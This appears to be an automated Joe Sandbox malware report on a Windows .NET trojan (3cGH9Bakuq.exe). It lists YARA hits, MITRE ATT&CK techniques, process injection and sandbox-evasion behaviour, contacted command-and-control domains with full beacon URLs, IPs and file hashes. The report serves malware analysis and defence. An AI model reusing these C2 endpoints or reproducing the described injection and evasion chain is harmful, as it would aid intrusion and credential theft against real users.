            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 491574 Sample: 3cGH9Bakuq Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected AntiVM3 2->44 46 4 other signatures 2->46 10 3cGH9Bakuq.exe 3 2->10         started        process3 file4 32 C:\Users\user\AppData\...\3cGH9Bakuq.exe.log, ASCII 10->32 dropped 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Injects a PE file into a foreign processes 10->60 14 3cGH9Bakuq.exe 10->14         started        17 3cGH9Bakuq.exe 10->17         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 19 explorer.exe 14->19 injected process8 dnsIp9 34 www.rangerbuddys.com 103.11.189.189, 49807, 80 VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG Singapore 19->34 36 www.vetpipes.com 104.143.9.211, 49804, 80 VIVIDHOSTINGUS United States 19->36 38 5 other IPs or domains 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 23 colorcpl.exe 19->23         started        26 autofmt.exe 19->26         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 23->50 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 28 cmd.exe 1 23->28         started        process13 process14 30 conhost.exe 28->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            3cGH9Bakuq.exe26%VirustotalBrowse
            3cGH9Bakuq.exe22%ReversingLabsWin32.Trojan.Pwsx

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.3cGH9Bakuq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.zhongyicts.com.cnA.0%Avira URL Cloudsafe
            http://www.vetpipes.com/scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v10%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.omniriot.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F0%Avira URL Cloudsafe
            http://www.rangerbuddys.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.founder.com.cn/cnenx0%Avira URL Cloudsafe
            http://www.fontbureau.comoW0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnorm0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cnA.0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.fontbureau.comdiafN0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnh-c0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cnenx0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.founder.com.cn/cned0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.carterandcone.comh0%URL Reputationsafe
            http://www.zhongyicts.com.cnh0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.comt0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.rangerbuddys.com
            103.11.189.189
            truefalse
              high
              www.omniriot.com
              154.208.82.163
              truefalse
                high
                marmorariapiramide.online
                143.198.15.243
                truefalse
                  high
                  www.vetpipes.com
                  104.143.9.211
                  truefalse
                    high
                    www.marmorariapiramide.online
                    unknown
                    unknownfalse
                      high
                      www.emptycc.net
                      unknown
                      unknownfalse
                        high
                        www.traexcel.com
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.vetpipes.com/scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1true
                          • Avira URL Cloud: safe
                          unknown
                          http://www.omniriot.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01Ftrue
                          • Avira URL Cloud: safe
                          unknown
                          http://www.rangerbuddys.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlutrue
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.vodien.com/colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersG3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bThe3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnA.3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_3cGH9Bakuq.exefalse
                                  high
                                  https://api.twitter.com/1.1/friendships/no_retweets/ids.json3cGH9Bakuq.exefalse
                                    high
                                    https://pbs.twimg.com/media/3cGH9Bakuq.exefalse
                                      high
                                      http://kr.battle.net/heroes/ko/3cGH9Bakuq.exefalse
                                        high
                                        http://www.fontbureau.com/designers?3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.vodien.com/singapore-email-hosting.phpcolorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpfalse
                                            high
                                            https://api.twitter.com/1.1/friendships/update.json3cGH9Bakuq.exefalse
                                              high
                                              http://www.tiro.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.twitter.com/1.1/blocks/create.json3cGH9Bakuq.exefalse
                                                high
                                                https://api.twitter.com/1.1/blocks/ids.json3cGH9Bakuq.exefalse
                                                  high
                                                  http://www.fontbureau.com/designers3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://api.twitter.com/1.1/statuses/unretweet/3cGH9Bakuq.exefalse
                                                      high
                                                      http://www.goodfont.co.kr3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.carterandcone.com3cGH9Bakuq.exe, 00000000.00000003.669096429.0000000005685000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.twitter.com/1.1/statuses/user_timeline.json3cGH9Bakuq.exefalse
                                                        high
                                                        https://upload.twitter.com/1.1/media/upload.json3cGH9Bakuq.exefalse
                                                          high
                                                          http://www.founder.com.cn/cnenx3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.comoW3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timeli3cGH9Bakuq.exefalse
                                                            high
                                                            http://www.founder.com.cn/cnorm3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sajatypeworks.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netD3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cn/cThe3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cnA.3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://api.twitter.com/1.1/account/verify_credentials.json3cGH9Bakuq.exefalse
                                                              high
                                                              http://www.galapagosdesign.com/staff/dennis.htm3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://fontfabrik.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.twitter.com/oauth/access_token3cGH9Bakuq.exefalse
                                                                high
                                                                http://www.fontbureau.comdiafN3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.founder.com.cn/cnh-c3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.twitter.com/1.1/favorites/destroy.json3cGH9Bakuq.exefalse
                                                                  high
                                                                  https://api.twitter.com/1.1/statuses/retweet/3cGH9Bakuq.exefalse
                                                                    high
                                                                    http://www.galapagosdesign.com/DPlease3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.twitter.com/1.1/statuses/destroy/3cGH9Bakuq.exefalse
                                                                      high
                                                                      https://api.twitter.com/1.1/statuses/home_timeline.json3cGH9Bakuq.exefalse
                                                                        high
                                                                        http://www.zhongyicts.com.cnenx3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.fonts.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.sandoll.co.kr3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.urwpp.deDPlease3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.zhongyicts.com.cn3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.sakkal.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://api.twitter.com/1.1/friends/list.json3cGH9Bakuq.exefalse
                                                                            high
                                                                            http://www.founder.com.cn/cned3cGH9Bakuq.exe, 00000000.00000003.667177411.0000000005686000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweets3cGH9Bakuq.exefalse
                                                                              high
                                                                              http://www.apache.org/licenses/LICENSE-2.03cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmp, 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.fontbureau.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.galapagosdesign.com/3cGH9Bakuq.exe, 00000000.00000003.676148683.00000000056B7000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://twitter.com/hanalen_3cGH9Bakuq.exefalse
                                                                                    high
                                                                                    https://api.twitter.com/1.1/statuses/mentions_timeline.json3cGH9Bakuq.exefalse
                                                                                      high
                                                                                      https://twitter.com/Dalsae_info3cGH9Bakuq.exefalse
                                                                                        high
                                                                                        https://userstream.twitter.com/1.1/user.json3cGH9Bakuq.exefalse
                                                                                          high
                                                                                          https://twitter.com/3cGH9Bakuq.exefalse
                                                                                            high
                                                                                            http://www.carterandcone.comh3cGH9Bakuq.exe, 00000000.00000003.667722258.0000000005686000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.zhongyicts.com.cnh3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_c3cGH9Bakuq.exefalse
                                                                                              high
                                                                                              https://api.twitter.com/1.1/statuses/update.json3cGH9Bakuq.exefalse
                                                                                                high
                                                                                                http://050005.voodoo.com/js/partner.jscolorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.carterandcone.coml3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://api.twitter.com/1.1/users/lookup.json3cGH9Bakuq.exefalse
                                                                                                    high
                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlN3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.founder.com.cn/cn3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.fontbureau.com/designers/frere-user.html3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://api.twitter.com/1.1/statuses/show.json3cGH9Bakuq.exefalse
                                                                                                          high
                                                                                                          http://www.fontbureau.com/designers/cabarga.html3cGH9Bakuq.exe, 00000000.00000003.673691153.00000000056BD000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.comt3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.jiyu-kobo.co.jp/3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.fontbureau.com/designers83cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://api.twitter.com/1.1/favorites/create.json3cGH9Bakuq.exefalse
                                                                                                                high
                                                                                                                https://api.twitter.com/oauth/authorize?oauth_token=3cGH9Bakuq.exefalse
                                                                                                                  high
                                                                                                                  https://api.twitter.com/1.1/direct_messages.json3cGH9Bakuq.exefalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers/3cGH9Bakuq.exe, 00000000.00000003.670846550.00000000056BD000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://api.twitter.com/1.1/friends/ids.json3cGH9Bakuq.exefalse
                                                                                                                        high
                                                                                                                        https://api.twitter.com/1.1/favorites/list.json3cGH9Bakuq.exefalse
                                                                                                                          high
                                                                                                                          https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.3cGH9Bakuq.exefalse
                                                                                                                            high
                                                                                                                            https://api.twitter.com/oauth/request_token3cGH9Bakuq.exefalse
                                                                                                                              high

                                                                                                                              Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.143.9.211
                                                                                                                              www.vetpipes.comUnited States
                                                                                                                              64200VIVIDHOSTINGUSfalse
                                                                                                                              143.198.15.243
                                                                                                                              marmorariapiramide.onlineUnited States
                                                                                                                              15557LDCOMNETFRfalse
                                                                                                                              154.208.82.163
                                                                                                                              www.omniriot.comSeychelles
                                                                                                                              134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                                                              103.11.189.189
                                                                                                                              www.rangerbuddys.comSingapore
                                                                                                                              58621VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGfalse

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                              Analysis ID:491574
                                                                                                                              Start date:27.09.2021
                                                                                                                              Start time:18:02:45
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 13m 36s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:light
                                                                                                                              Sample file name:3cGH9Bakuq (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:19
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.evad.winEXE@10/1@6/4
                                                                                                                              EGA Information:Failed
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 40.3% (good quality ratio 35.4%)
                                                                                                                              • Quality average: 72.3%
                                                                                                                              • Quality standard deviation: 32.9%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              • Number of executed functions: 0
                                                                                                                              • Number of non-executed functions: 0
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              Show All
                                                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 13.107.4.50, 23.0.174.185, 23.0.174.200, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                                                                                                              • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, b1ns.c-0001.c-msedge.net, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b1ns.au-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              18:03:49API Interceptor1x Sleep call for process: 3cGH9Bakuq.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              No context

                                                                                                                              Domains

                                                                                                                              No context

                                                                                                                              ASN

                                                                                                                              No context

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3cGH9Bakuq.exe.log
                                                                                                                              Process:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.355304211458859
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                              Malicious:true
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Entropy (8bit):7.294961182646713
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                              File name:3cGH9Bakuq.exe
                                                                                                                              File size:626688
                                                                                                                              MD5:0eca879131a7b104418b085db7f761c3
                                                                                                                              SHA1:07fa4692aa15a409091bc6190bf33b5942db99e6
